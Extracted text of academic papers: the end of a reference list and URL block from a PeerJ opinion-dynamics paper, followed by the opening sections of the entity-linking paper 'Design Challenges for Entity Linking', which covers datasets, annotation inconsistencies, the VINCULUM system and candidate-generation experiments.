http://dx.doi.org/10.1088/0256-307X/23/3/061 http://dx.doi.org/10.1145/956750.956769 http://dx.doi.org/10.1145/2187836.2187871 http://arxiv.org/abs/1506.03022 http://dx.doi.org/10.1145/2433396.2433478 http://dx.doi.org/10.1109/CCDC.2012.6243111 http://dx.doi.org/10.1109/ACSSC.2011.6190091 http://dx.doi.org/10.1109/ICASSP.2012.6288564 http://dx.doi.org/10.1016/j.jesp.2009.04.016 http://dx.doi.org/10.1126/science.1240466 http://dx.doi.org/10.1007/s11109-010-9112-2 http://dx.doi.org/10.1103/PhysRevLett.86.3200 http://dx.doi.org/10.1038/35106555 http://dx.doi.org/10.1016/j.jesp.2011.03.011 http://arxiv.org/abs/1506.00251 http://dx.doi.org/10.7717/peerj-cs.42 Song C, Havlin S, Makse HA. 2005. Self-similarity of complex networks. Nature 433(7024):392–395 DOI 10.1038/nature03248. Strogatz SH. 2001. Exploring complex networks. Nature 410(6825):268–276 DOI 10.1038/35065725. Sznajd-Weron K, Sznajd J. 2000. Opinion evolution in closed community. International Journal of Modern Physics C 11(06):1157–1165 DOI 10.1142/S0129183100000936. Topirceanu A, Udrescu M. 2014. SocialSim: a framework for opinion dynamics simulations. Available at http://www.cs.upt.ro/∼alext/acsanet. Tsvetovat M, Carley KM. 2005. Generation of realistic social network datasets for testing of analysis and simulation tools. Technical Report, DTIC Document. Valente TW, Fujimoto K, Unger JB, Soto DW, Meeker D. 2013. Variations in network boundary and type: a study of adolescent peer influences. Social Networks 35(3):309–316 DOI 10.1016/j.socnet.2013.02.008. Van Der Schalk J, Fischer A, Doosje B, Wigboldus D, Hawk S, Rotteveel M, Hess U. 2011. Convergent and divergent responses to emotional displays of ingroup and outgroup. Emotion 11(2):286–298 DOI 10.1037/a0022582. Wang XF, Chen G. 2003. Complex networks: small-world, scale-free and beyond. Circuits and Systems Magazine, IEEE 3(1):6–20 DOI 10.1109/MCAS.2003.1228503. Wang J, Rong L. 2008. Evolving small-world networks based on the modified ba model. In: Computer science and information technology, 2008. ICCSIT’08. International conference on. IEEE, 143–146 DOI 10.1109/ICCSIT.2008.119. Watts DJ, Strogatz SH. 1998. Collective dynamics of small-world networks. Nature 393(6684):440–442 DOI 10.1038/30918. Weidlich W. 2002. Sociodynamics-a systematic approach to mathematical modelling in the social sciences. Nonlinear Phenomena in Complex Systems 5(4):479–487 DOI 10.1234/12345678. Windschitl PD, Rose JP, Stalkfleet MT, Smith AR. 2008. Are people excessive or judicious in their egocentrism? A modeling approach to understanding bias and accuracy in people’s optimism. Journal of Personality and Social Psychology 95(2):253–273 DOI 10.1037/0022-3514.95.2.253. Yildiz E, Ozdaglar A, Acemoglu D, Saberi A, Scaglione A. 2013. Binary opinion dynamics with stubborn agents. ACM Transactions on Economics and Computation 1(4):19:1–19:30 DOI 10.1145/2538508. Zaidi F. 2013. Small world networks and clustered small world networks with random connectivity. Social Network Analysis and Mining 3(1):51–63 DOI 10.1007/s13278-012-0052-1. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 33/33 https://peerj.com/computer-science/ http://dx.doi.org/10.1038/nature03248 http://dx.doi.org/10.1038/35065725 http://dx.doi.org/10.1142/S0129183100000936 http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://dx.doi.org/10.1016/j.socnet.2013.02.008 http://dx.doi.org/10.1037/a0022582 http://dx.doi.org/10.1109/MCAS.2003.1228503 http://dx.doi.org/10.1109/ICCSIT.2008.119 http://dx.doi.org/10.1038/30918 http://dx.doi.org/10.1234/12345678 http://dx.doi.org/10.1037/0022-3514.95.2.253 http://dx.doi.org/10.1145/2538508 http://dx.doi.org/10.1007/s13278-012-0052-1 http://dx.doi.org/10.7717/peerj-cs.42 Tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks Introduction Methods Discrete simulation methodology Results Opinion formation phases and social balancing Phase transition New tolerance-based opinion model Model validation Simulation on basic topologies Phase transition in opinion dynamics Discussion References work_xaqa5nndx5b53m2indgg7t4zxm ---- Design Challenges for Entity Linking Xiao Ling Sameer Singh University of Washington, Seattle WA {xiaoling,sameer,weld}@cs.washington.edu Daniel S. Weld Abstract Recent research on entity linking (EL) has in- troduced a plethora of promising techniques, ranging from deep neural networks to joint in- ference. But despite numerous papers there is surprisingly little understanding of the state of the art in EL. We attack this confusion by analyzing differences between several versions of the EL problem and presenting a simple yet effective, modular, unsupervised system, called VINCULUM, for entity linking. We con- duct an extensive evaluation on nine data sets, comparing VINCULUM with two state-of-the- art systems, and elucidate key aspects of the system that include mention extraction, candi- date generation, entity type prediction, entity coreference, and coherence. 1 Introduction Entity Linking (EL) is a central task in information extraction — given a textual passage, identify entity mentions (substrings corresponding to world entities) and link them to the corresponding entry in a given Knowledge Base (KB, e.g. Wikipedia or Freebase). For example, JetBlue begins direct service between Barnstable Airport and JFK International. Here, “JetBlue” should be linked to the en- tity KB:JetBlue, “Barnstable Airport” to KB:Barnstable Municipal Airport, and “JFK International” to KB:John F. Kennedy International Airport1. The links not only 1We use typewriter font, e.g., KB:Entity, to indicate an entity in a particular KB, and quotes, e.g., “Mention”, to denote textual mentions. provide semantic annotations to human readers but also a machine-consumable representation of the most basic semantic knowledge in the text. Many other NLP applications can benefit from such links, such as distantly-supervised relation extraction (Craven and Kumlien, 1999; Riedel et al., 2010; Hoffmann et al., 2011; Koch et al., 2014) that uses EL to create training data, and some coreference systems that use EL for disambiguation (Hajishirzi et al., 2013; Zheng et al., 2013; Durrett and Klein, 2014). Unfortunately, in spite of numerous papers on the topic and several published data sets, there is surprisingly little understanding about state-of-the-art performance. We argue that there are three reasons for this con- fusion. First, there is no standard definition of the problem. A few variants have been studied in the liter- ature, such as Wikification (Milne and Witten, 2008; Ratinov et al., 2011; Cheng and Roth, 2013) which aims at linking noun phrases to Wikipedia entities and Named Entity Linking (aka Named Entity Dis- ambiguation) (McNamee and Dang, 2009; Hoffart et al., 2011) which targets only named entities. Here we use the term Entity Linking as a unified name for both problems, and Named Entity Linking (NEL) for the subproblem of linking only named entities. But names are just one part of the problem. For many variants there are no annotation guidelines for scor- ing links. What types of entities are valid targets? When multiple entities are plausible for annotating a mention, which one should be chosen? Are nested mentions allowed? Without agreement on these is- sues, a fair comparison is elusive. Secondly, it is almost impossible to assess ap- proaches, because systems are rarely compared using the same data sets. For instance, Hoffart et al. (2011) 315 Transactions of the Association for Computational Linguistics, vol. 3, pp. 315–328, 2015. Action Editor: Kristina Toutanova. Submission batch: 11/2014; Revision batch 3/2015; Published 6/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. developed a new data set (AIDA) based on the CoNLL 2003 Named Entity Recognition data set but failed to evaluate their system on MSNBC previ- ously created by (Cucerzan, 2007); Wikifier (Cheng and Roth, 2013) compared to the authors’ previous system (Ratinov et al., 2011) using the originally se- lected datasets but didn’t evaluate using AIDA data. Finally, when two end-to-end systems are com- pared, it is rarely clear which aspect of a system makes one better than the other. This is especially problematic when authors introduce complex mech- anisms or nondeterministic methods that involve learning-based reranking or joint inference. To address these problems, we analyze several sig- nificant inconsistencies among the data sets. To have a better understanding of the importance of various techniques, we develop a simple and modular, un- supervised EL system, VINCULUM. We compare VINCULUM to the two leading sophisticated EL sys- tems on a comprehensive set of nine datasets. While our system does not consistently outperform the best EL system, it does come remarkably close and serves as a simple and competitive baseline for future re- search. Furthermore, we carry out an extensive ab- lation analysis, whose results illustrate 1) even a near-trivial model using CrossWikis (Spitkovsky and Chang, 2012) performs surprisingly well, and 2) in- corporating a fine-grained set of entity types raises that level even higher. In summary, we make the following contributions: • We analyze the differences among several versions of the entity linking problem, compare existing data sets and discuss annotation inconsistencies between them. (Sections 2 & 3) • We present a simple yet effective, modular, unsu- pervised system, VINCULUM, for entity linking. We make the implementation open source and pub- licly available for future research.2 (Section 4) • We compare VINCULUM to 2 state-of-the-art sys- tems on an extensive evaluation of 9 data sets. We also investigate several key aspects of the system including mention extraction, candidate genera- tion, entity type prediction, entity coreference, and coherence between entities. (Section 5) 2http://github.com/xiaoling/vinculum 2 No Standard Benchmark In this section, we describe some of the key differ- ences amongst evaluations reported in existing litera- ture, and propose a candidate benchmark for EL. 2.1 Data Sets Nine data sets are in common use for EL evaluation; we partition them into three groups. The UIUC group (ACE and MSNBC datasets) (Ratinov et al., 2011), AIDA group (with dev and test sets) (Hoffart et al., 2011), and TAC-KBP group (with datasets rang- ing from the 2009 through 2012 competitions) (Mc- Namee and Dang, 2009). Their statistics are summa- rized in Table 1 3. Our set of nine is not exhaustive, but most other datasets, e.g. CSAW (Kulkarni et al., 2009) and AQUAINT (Milne and Witten, 2008), annotate com- mon concepts in addition to named entities. As we argue in Sec. 3.1, it is extremely difficult to define an- notation guidelines for common concepts, and there- fore they aren’t suitable for evaluation. For clarity, this paper focuses on linking named entities. Sim- ilarly, we exclude datasets comprising Tweets and other short-length documents, since radically differ- ent techniques are needed for the specialized corpora. Table 2 presents a list of recent EL publications showing the data sets that they use for evaluation. The sparsity of this table is striking — apparently no system has reported the performance data from all three of the major evaluation groups. 2.2 Knowledge Base Existing benchmarks have also varied considerably in the knowledge base used for link targets. Wikipedia has been most commonly used (Milne and Wit- ten, 2008; Ratinov et al., 2011; Cheng and Roth, 2013), however datasets were annotated using dif- ferent snapshots and subsets. Other KBs include Yago (Hoffart et al., 2011), Freebase (Sil and Yates, 2013), DBpedia (Mendes et al., 2011) and a subset of Wikipedia (Mayfield et al., 2012). Given that al- most all KBs are descendants of Wikipedia, we use Wikipedia as the base KB in this work.4 3An online appendix containing details of the datasets is avail- able at https://github.com/xiaoling/vinculum/ raw/master/appendix.pdf. 4Since the knowledge bases for all the data sets were around 2011, we use Wikipedia dump 20110513. 316 http://github.com/xiaoling/vinculum https://github.com/xiaoling/vinculum/raw/master/appendix.pdf https://github.com/xiaoling/vinculum/raw/master/appendix.pdf Group Data Set # of Mentions Entity Types KB # of NILs Eval. Metric UIUC ACE 244 Any Wikipedia Topic Wikipedia 0 BOC F1 MSNBC 654 Any Wikipedia Topic Wikipedia 0 BOC F1 AIDA AIDA-dev 5917 PER,ORG,LOC,MISC Yago 1126 Accuracy AIDA-test 5616 PER,ORG,LOC,MISC Yago 1131 Accuracy TAC KBP TAC09 3904 PERT ,ORGT ,GPE TAC ⊂ Wiki 2229 Accuracy TAC10 2250 PERT ,ORGT ,GPE TAC ⊂ Wiki 1230 Accuracy TAC10T 1500 PERT ,ORGT ,GPE TAC ⊂ Wiki 426 Accuracy TAC11 2250 PERT ,ORGT ,GPE TAC ⊂ Wiki 1126 B3+ F1 TAC12 2226 PERT ,ORGT ,GPE TAC ⊂ Wiki 1049 B3+ F1 Table 1: Characteristics of the nine NEL data sets. Entity types: The AIDA data sets include named entities in four NER classes, Person (PER), Organization (ORG), Location (LOC) and Misc. In TAC KBP data sets, both Person (PERT ) and Organization entities (ORGT ) are defined differently from their NER counterparts and geo-political entities (GPE), different from LOC, exclude places like KB:Central California. KB (Sec. 2.2): The knowledge base used when each data was being developed. Evaluation Metric (Sec. 2.3): Bag-of-Concept F1 is used as the evaluation metric in (Ratinov et al., 2011; Cheng and Roth, 2013). B3+ F1 used in TAC KBP measures the accuracy in terms of entity clusters, grouped by the mentions linked to the same entity. Data Set ACE MSNBC AIDA-test TAC09 TAC10 TAC11 TAC12 AQUAINT CSAW Cucerzan (2007) x Milne and Witten (2008) x Kulkarni et al. (2009) x x Ratinov et al. (2011) x x x Hoffart et al. (2011) x Han and Sun (2012) x x He et al. (2013a) x x He et al. (2013b) x x x Cheng and Roth (2013) x x x x Sil and Yates (2013) x x x Li et al. (2013) x x Cornolti et al. (2013) x x x TAC-KBP participants x x x x Table 2: A sample of papers on entity linking with the data sets used in each paper (ordered chronologically). TAC-KBP proceedings comprise additional papers (McNamee and Dang, 2009; Ji et al., 2010; Ji et al., 2010; Mayfield et al., 2012). Our intention is not to exhaust related work but to illustrate how sparse evaluation impedes comparison. NIL entities: In spite of Wikipedia’s size, there are many real-world entities that are absent from the KB. When such a target is missing for a mention, it is said to link to a NIL entity (McNamee and Dang, 2009) (aka out-of-KB or unlinkable entity (Hoffart et al., 2014)). In the TAC KBP, in addition to deter- mining if a mention has no entity in the KB to link, all the mentions that represent the same real world entities must be clustered together. Since our focus is not to create new entities for the KB, NIL clustering is beyond the scope of this paper. The AIDA data sets similarly contain such NIL annotations whereas ACE and MSNBC omit these mentions altogether. We only evaluate whether a mention with no suitable entity in the KB is predicted as NIL. 2.3 Evaluation Metrics While a variety of metrics have been used for evalu- ation, there is little agreement on which one to use. However, this detail is quite important, since the choice of metric strongly biases the results. We de- scribe the most common metrics below. Bag-of-Concept F1 (ACE, MSNBC): For each document, a gold bag of Wikipedia entities is evalu- ated against a bag of system output entities requiring exact segmentation match. This metric may have its historical reason for comparison but is in fact flawed since it will obtain 100% F1 for an annotation in which every mention is linked to the wrong entity, but the bag of entities is the same as the gold bag. Micro Accuracy (TAC09, TAC10, TAC10T): For a list of given mentions, the metric simply measures 317 the percentage of correctly predicted links. TAC-KBP B3+ F1 (TAC11, TAC12): The men- tions that are predicted as NIL entities are required to be clustered according to their identities (NIL cluster- ing). The overall data set is evaluated using a entity cluster-based B3+ F1. NER-style F1 (AIDA): Similar to official CoNLL NER F1 evaluation, a link is considered correct only if the mention matches the gold boundary and the linked entity is also correct. A wrong link with the correct boundary penalizes both precision and recall. We note that Bag-of-Concept F1 is equivalent to the measure for Concept-to-Wikipedia task proposed in (Cornolti et al., 2013) and NER-style F1 is the same as strong annotation match. In the experiments, we use the official metrics for the TAC data sets and NER-style F1 for the rest. 3 No Annotation Guidelines Not only do we lack a common data set for evalua- tion, but most prior researchers fail to even define the problem under study, before developing algorithms. Often an overly general statement such as annotat- ing the mentions to “referent Wikipedia pages” or “corresponding entities” is used to describe which entity link is appropriate. This section shows that failure to have a detailed annotation guideline causes a number of key inconsistencies between data sets. A few assumptions are subtly made in different papers, which makes direct comparisons unfair and hard to comprehend. 3.1 Entity Mentions: Common or Named? Which entities deserve links? Some argue for re- stricting to named entities. Others argue that any phrase that can be linked to a Wikipedia entity adds value. Without a clear answer to this issue, any data set created will be problematic. It’s not fair to pe- nalize a NEL system for skipping a common noun phrases; nor would it be fair to lower the precision of a system that “incorrectly” links a common concept. However, we note that including mentions of com- mon concepts is actually quite problematic, since the choice is highly subjective. Example 1 In December 2008, Hoke was hired as the head football coach at San Diego State Uni- versity. (Wikipedia) At first glance, KB:American football seems the gold-standard link. However, there is another entity KB:College football, which is clearly also, if not more, appropriate. If one argues that KB:College football should be the right choice given the context, what if KB:College football does not exist in the KB? Should NIL be returned in this case? The question is unanswered.5 For the rest of this paper, we focus on the (better defined) problem of solely linking named entities.6 AQUAINT and CSAW are therefore not used for eval- uation due to an disproportionate number of common concept annotations. 3.2 How Specific Should Linked Entities Be? It is important to resolve disagreement when more than one annotation is plausible. The TAC- KBP annotation guidelines (tac, 2012) specify that different iterations of the same organization (e.g. the KB:111th U.S. Congress and the KB:112th U.S. Congress) should not be con- sidered as distinct entities. Unfortunately, this is not a common standard shared across the data sets, where often the most specific possible entity is preferred. Example 2 Adams and Platt are both injured and will miss England’s opening World Cup qualifier against Moldova on Sunday. (AIDA) Here the mention “World Cup” is labeled as KB:1998 FIFA World Cup, a specific occur- rence of the event KB:FIFA World Cup. It is indeed difficult to decide how specific the gold link should be. Given a static knowledge base, which is often incomplete, one cannot always find the most specific entity. For instance, there is no Wikipedia page for the KB:116th U.S. Congress be- cause the Congress has not been elected yet. On the other hand, using general concepts can cause troubles for machine reading. Consider president-of relation extraction on the following sentence. Example 3 Joe Biden is the Senate President in the 113th United States Congress. 5Note that linking common noun phrases is closely related to Word Sense Disambiguation (Moro et al., 2014). 6We define named entity mention extensionally: any name uniquely referring to one entity of a predefined class, e.g. a specific person or location. 318 Person Common Concepts E.g. Brain_Tumor, Desk, Water, etc. Misc.Organization Location TAC GPE (Geo- political Entities) TAC Organization TAC Person Figure 1: Entities divided by their types. For named enti- ties, the solid squares represent 4 CoNLL(AIDA) classes; the red dashed squares display 3 TAC classes; the shaded rectangle depicts common concepts. Failure to distinguish different Congress iterations would cause an information extraction system to falsely extracting the fact that KB:Joe Biden is the Senate President of the KB:United States Congress at all times! 3.3 Metonymy Another situation in which more than one annotation is plausible is metonymy, which is a way of referring to an entity not by its own name but rather a name of some other entity it is associated with. A common example is to refer to a country’s government using its capital city. Example 4 Moscow’s as yet undisclosed propos- als on Chechnya’s political future have , mean- while, been sent back to do the rounds of various government departments. (AIDA) The mention here, “Moscow”, is labeled as KB:Government of Russia in AIDA. If this sentence were annotated in TAC-KBP, it would have been labeled as KB:Moscow (the city) instead. Even the country KB:Russia seems to be a valid label. However, neither the city nor the country can ac- tually make a proposal. The real entity in play is KB:Government of Russia. 3.4 Named Entities, But of What Types? Even in the data sets consisting of solely named en- tities, the types of the entities vary and therefore the data distribution differs. TAC-KBP has a clear definition of what types of entities require links, namely Person, Organization and Geo-political enti- ties. AIDA, which adopted the NER data set from the CoNLL shared task, includes entities from 4 classes, Person, Organization, Location and Misc.7 Com- 7 http://www.cnts.ua.ac.be/conll2003/ner/ annotation.txt pared to the AIDA entity types, it is obvious that TAC- KBP is more restrictive, since it does not have Misc. entities (e.g. KB:FIFA World Cup). Moreover, TAC entities don’t include fictional characters or organizations, such as KB:Sherlock Holmes. TAC GPEs include some geographical regions, such as KB:France, but exclude those without govern- ments, such as KB:Central California or lo- cations such as KB:Murrayfield Stadium.8 Figure 1 summarizes the substantial differences be- tween the two type sets. 3.5 Can Mention Boundaries Overlap? We often see one entity mention nested in another. For instance, a U.S. city is often followed by its state, such as “Portland, Oregon”. One can split the whole mention to individual ones, “Portland” for the city and “Oregon” for the city’s state. AIDA adopts this segmentation. However, annotations in an early TAC- KBP dataset (2009) select the whole span as the men- tion. We argue that all three mentions make sense. In fact, knowing the structure of the mention would facilitate the disambiguation (i.e. the state name pro- vides enough context to uniquely identify the city entity). Besides the mention segmentation, the links for the nested entities may also be ambiguous. Example 5 Dorothy Byrne, a state coordinator for the Florida Green Party, said she had been in- undated with angry phone calls and e-mails from Democrats, but has yet to receive one regretful note from a Nader voter. The gold annotation from ACE is KB:Green Party of Florida even though the mention doesn’t contain “Florida” and can arguably be linked to KB:US Green Party. 4 A Simple & Modular Linking Method In this section, we present VINCULUM, a simple, unsupervised EL system that performs compara- bly to the state of the art. As input, VINCULUM takes a plain-text document d and outputs a set of segmented mentions with their associated entities Ad = {(mi, li)}. VINCULUM begins with mention extraction. For each identified mention m, candi- date entities Cm = {cj} are generated for linking. VINCULUM assigns each candidate a linking score 8 http://nlp.cs.rpi.edu/kbp/2014/elquery.pdf 319 http://www.cnts.ua.ac.be/conll2003/ner/annotation.txt http://www.cnts.ua.ac.be/conll2003/ner/annotation.txt http://nlp.cs.rpi.edu/kbp/2014/elquery.pdf Candidate Generation Entity Type Coreference Coherence Mention phrases less context sentence document world knowledge more context All possible entities One most likely entity Figure 2: The process of finding the best entity for a mention. All possible entities are sifted through as VINCULUM proceeds at each stage with a widening range of context in consideration. s(cj|m,d) based on the entity type compatibility, its coreference mentions, and other entity links around this mention. The candidate entity with the maxi- mum score, i.e. l = arg max c∈Cm s(c|m,d), is picked as the predicted link of m. Figure 2 illustrates the linking pipeline that follows mention extraction. For each mention, VINCULUM ranks the candidates at each stage based on an ever widening context. For example, candidate generation (Section 4.2) merely uses the mention string, entity typing (Section 4.3) uses the sentence, while corefer- ence (Section 4.4) and coherence (Section 4.5) use the full document and Web respectively. Our pipeline mimics the sieve structure introduced in (Lee et al., 2013), but instead of merging coreference clusters, we adjust the probability of candidate entities at each stage. The modularity of VINCULUM enables us to study the relative impact of its subcomponents. 4.1 Mention Extraction The first step of EL extracts potential mentions from the document. Since VINCULUM restricts attention to named entities, we use a Named Entity Recogni- tion (NER) system (Finkel et al., 2005). Alternatively, an NP chunker may be used to identify the mentions. 4.2 Dictionary-based Candidate Generation While in theory a mention could link to any entity in the KB, in practice one sacrifices little by restricting attention to a subset (dozens) precompiled using a dictionary. A common way to build such a dictionary D is by crawling Web pages and aggregating anchor links that point to Wikipedia pages. The frequency with which a mention (anchor text), m, links to a par- ticular entity (anchor link), c, allows one to estimate the conditional probability p(c|m). We adopt the CrossWikis dictionary, which was computed from a Google crawl of the Web (Spitkovsky and Chang, 2012). The dictionary contains more than 175 million unique strings with the entities they may represent. In the literature, the dictionary is often built from the anchor links within the Wikipedia website (e.g., (Ratinov et al., 2011; Hoffart et al., 2011)). In addition, we employ two small but precise dic- tionaries for U.S. state abbreviations and demonyms when the mention satisfies certain conditions. For U.S. state abbreviations, a comma before the men- tion is required. For demonyms, we ensure that the mention is either an adjective or a plural noun. 4.3 Incorporating Entity Types For an ambiguous mention such as “Washington”, knowing that the mention denotes a person allows an EL system to promote KB:George Washington while lowering the rank of the capital city in the candi- date list. We incorporate this intuition by combining it probabilistically with the CrossWikis prior. p(c|m,s) = ∑ t∈T p(c,t|m,s) = ∑ t∈T p(c|m,t,s)p(t|m,s) , where s denotes the sentence containing this men- tion m and T represents the set of all possible types. We assume the candidate c and the sentential con- text s are conditionally independent if both the men- tion m and its type t are given. In other words, p(c|m,t,s) = p(c|m,t), the RHS of which can be estimated by renormalizing p(c|m) w.r.t. type t: p(c|m,t) = p(c|m)∑ c7→t p(c|m) , where c 7→ t indicates that t is one of c’s entity types.9 The other part of the equation, p(t|m,s), can be estimated by any off-the-shelf Named Entity Recognition system, e.g. Finkel et al. (2005) and Ling and Weld (2012). 4.4 Coreference It is common for entities to be mentioned more than once in a document. Since some mentions are less ambiguous than others, it makes sense to use the 9We notice that an entity often has multiple appropriate types, e.g. a school can be either an organization or a location depend- ing on the context. We use Freebase to provide the entity types and map them appropriately to the target type set. 320 most representative mention for linking. To this end, VINCULUM applies a coreference resolution system (e.g. Lee et al. (2013)) to cluster coreferent mentions. The representative mention of a cluster is chosen for linking.10 While there are more sophisticated ways to integrate EL and coreference (Hajishirzi et al., 2013), VINCULUM’s pipeline is simple and modular. 4.5 Coherence When KB:Barack Obama appears in a document, it is more likely that the mention “Washington” rep- resents the capital KB:Washington, D.C. as the two entities are semantically related, and hence the joint assignment is coherent. A number of re- searchers found inclusion of some version of coher- ence is beneficial for EL (Cucerzan, 2007; Milne and Witten, 2008; Ratinov et al., 2011; Hoffart et al., 2011; Cheng and Roth, 2013). For incorporating it in VINCULUM, we seek a document-wise assignment of entity links that maximizes the sum of the coher- ence scores between each pair of entity links pre- dicted in the document d, i.e. ∑ 1≤i<j≤|Md| φ(lmi, lmj ) where φ is a function that measures the coherence between two entities, Md denotes the set of all the mentions detected in d and lmi (lmj ) is one of the candidates of mi(mj). Instead of searching for the exact solution in a brute-force manner (O(|C||Md|) where |C| = max m∈Md |Cm|), we isolate each mention and greedily look for the best candidate by fixing the predictions of other mentions, allowing linear time search (O(|C| · |Md|)). Specifically, for a mention m and each of its candidates, we compute a score, coh(c) = 1 |Pd|−1 ∑ p∈Pd\{pm} φ(p,c),c ∈ Cm, where Pd is the union of all intermediate links {pm} in the document. Since both measures take values between 0 and 1, we denote the coherence score coh(c) as pφ(c|Pd), the conditional probability of an entity given other entities in the document. The final score of a can- 10Note that the representative mention in coreference reso- lution is not always the best mention for linking. When the representative mention contains a relative clause, we use the submention without the clause, which is favorable for candidate generation. When the representative mention is a location, a longer, non-conjunctive mention is preferred if possible. We also apply some heuristics to find organization acronyms, etc. didate is the sum of coherence pφ(c|Pd) and type compatibility p(c|m,s). Two coherence measures have been found to be useful: Normalized Google Distance (NGD) (Milne and Witten, 2008; Ratinov et al., 2011) and rela- tional score (Cheng and Roth, 2013). NGD be- tween two entities ci and cj is defined based on the link structure between Wikipedia articles as follows: φNGD(ci,cj) = 1 − log(max(|Li|,|Li|))−log(|Li∩Lj|)log(W)−log(min(|Li|,|Li|)) where Li and Lj are the incoming (or outgoing) links in the Wikipedia articles for ci and cj respectively and W is the total number of entities in Wikipedia. The relational score between two entities is a binary indicator whether a relation exists between them. We use Freebase 11 as the source of the relation triples F = {(sub,rel,obj)}. Relational coherence φREL is thus defined as φREL(ei,ej) = { 1 ∃r,(ei,r,ej) or (ej,r,ei) ∈ F 0 otherwise. 5 Experiments In this section, we present experiments to address the following questions: • Is NER sufficient to identify mentions? (Sec. 5.1) • How much does candidate generation affect final EL performance? (Sec. 5.2) • How much does entity type prediction help EL? What type set is most appropriate? (Sec. 5.3) • How much does coherence improve the EL results? (Sec. 5.4) • How well does VINCULUM perform compared to the state-of-the-art? (Sec. 5.5) • Finally, which of VINCULUM’s components con- tribute the most to its performance? (Sec. 5.6) 5.1 Mention Extraction We start by using Stanford NER for mention extrac- tion and measure its efficacy by the recall of correct mentions shown in Table 3. TAC data sets are not included because the mention strings are given in that competition. The results indicate that at least 10% of the gold-standard mentions are left out when NER, 11The mapping between Freebase and Wikipedia is provided at https://developers.google.com/freebase. 321 https://developers.google.com/freebase ACE MSNBC AIDA-dev AIDA-test R P R P R P R P NER 89.7 10.9 77.7 65.5 89.0 75.6 87.1 74.0 +NP 96.0 2.4 90.2 12.4 94.7 21.2 92.2 21.8 +DP 96.8 1.8 90.8 9.3 95.8 14.0 93.8 13.5 +NP+DP 98.0 1.2 92.0 5.8 95.9 9.4 94.1 9.4 Table 3: Performance(%, R: Recall; P: Precision) of the correct mentions using different mention extraction strategies. ACE and MSNBC only annotate a subset of all the mentions and therefore the absolute values of precision are largely underestimated. alone, is used to detect mentions. Some of the miss- ing mentions are noun phrases without capitalization, a well-known limitation of automated extractors. To recover them, we experiment with an NP chunker (NP) 12 and a deterministic noun phrase extractor based on parse trees (DP). Although we expect them to introduce spurious mentions, the purpose is to esti- mate an upper bound for mention recall. The results confirm the intuition: both methods improve recall, but the effect on precision is prohibitive. Therefore, we only use NER in subsequent experiments. Note that the recall of mention extraction is an upper bound of the recall of end-to-end predictions. 5.2 Candidate Generation In this section, we inspect the performance of can- didate generation. We compare CrossWikis with an intra-Wikipedia dictionary 13 and Freebase Search API 14. Each candidate generation component takes a mention string as input and returns an ordered list of candidate entities representing the mention. The candidates produced by Crosswikis and the intra- Wikipedia dictionary are ordered by their conditional probabilities given the mention string. Freebase API provides scores for the entities using a combination of text similarity and an in-house entity relevance score. We compute candidates for the union of all the non-NIL mentions from all 9 data sets and mea- sure their efficacy by recall@k. From Figure 3, it is clear that CrossWikis outperforms both the intra- Wikipedia dictionary and Freebase Search API for almost all k. The intra-Wikipedia dictionary is on a par with CrossWikis at k = 1 but in general has a 12OpenNLP NP Chunker: opennlp.apache.org 13adopted from AIDA (Hoffart et al., 2011) 14https://www.googleapis.com/freebase/v1/ search, restricted to no more than 220 candidates per query. 1 3 5 10 20 30 50 100 Inf 0 0.2 0.4 0.6 0.8 1 k R e c a ll @ k CrossWikis Intra−Wikipedia Freebase Search Figure 3: Recall@k on an aggregate of nine data sets, comparing three candidate generation methods. 1 2 3 5 10 20 30 50 100 Inf 0 0.2 0.4 0.6 0.8 1 k R e c a ll @ k MSNBC ACE AIDA−dev AIDA−test TAC09 TAC10 TAC10T TAC11 TAC12 Figure 4: Recall@k using CrossWikis for candidate gen- eration, split by data set. 30 is chosen to be the cut-off value in consideration of both efficiency and accuracy. lower coverage of the gold candidates compared to CrossWikis 15. Freebase API offers a better coverage than the intra-Wikipedia dictionary but is less effi- cient than CrossWikis. In other words, Freebase API needs a larger cut-off value to include the gold entity in the candidate set. Using CrossWikis for candidate generation, we plot the recall@k curves per data set (Figure 4). To our surprise, in most data sets, CrossWikis alone can achieve more than 70% recall@1. The only excep- tions are TAC11 and TAC12 because the organizers intentionally selected the mentions that are highly ambiguous such as “ABC” and/or incomplete such as “Brown”. For efficiency, we set a cut-off threshold at 30 (> 80% recall for all but one data set). Note that Crosswikis itself can be used a context-insensitive EL system by looking up the mention string and predict- ing the entity with the highest conditional probability. The second row in Table 4 presents the results using this simple baseline. Crosswikis alone, using only the mention string, has a fairly reasonable performance. 15We also compared to another intra-Wikipedia dictionary (Table 3 in (Ratinov et al., 2011)). A recall of 86.85% and 88.67% is reported for ACE and MSNBC, respectively, at a cut- off level of 20. CrossWikis has a recall of 90.1% and 93.3% at the same cut-off. 322 opennlp.apache.org https://www.googleapis.com/freebase/v1/search https://www.googleapis.com/freebase/v1/search Approach TAC09 TAC10 TAC10T TAC11 TAC12 AIDA-dev AIDA-test ACE 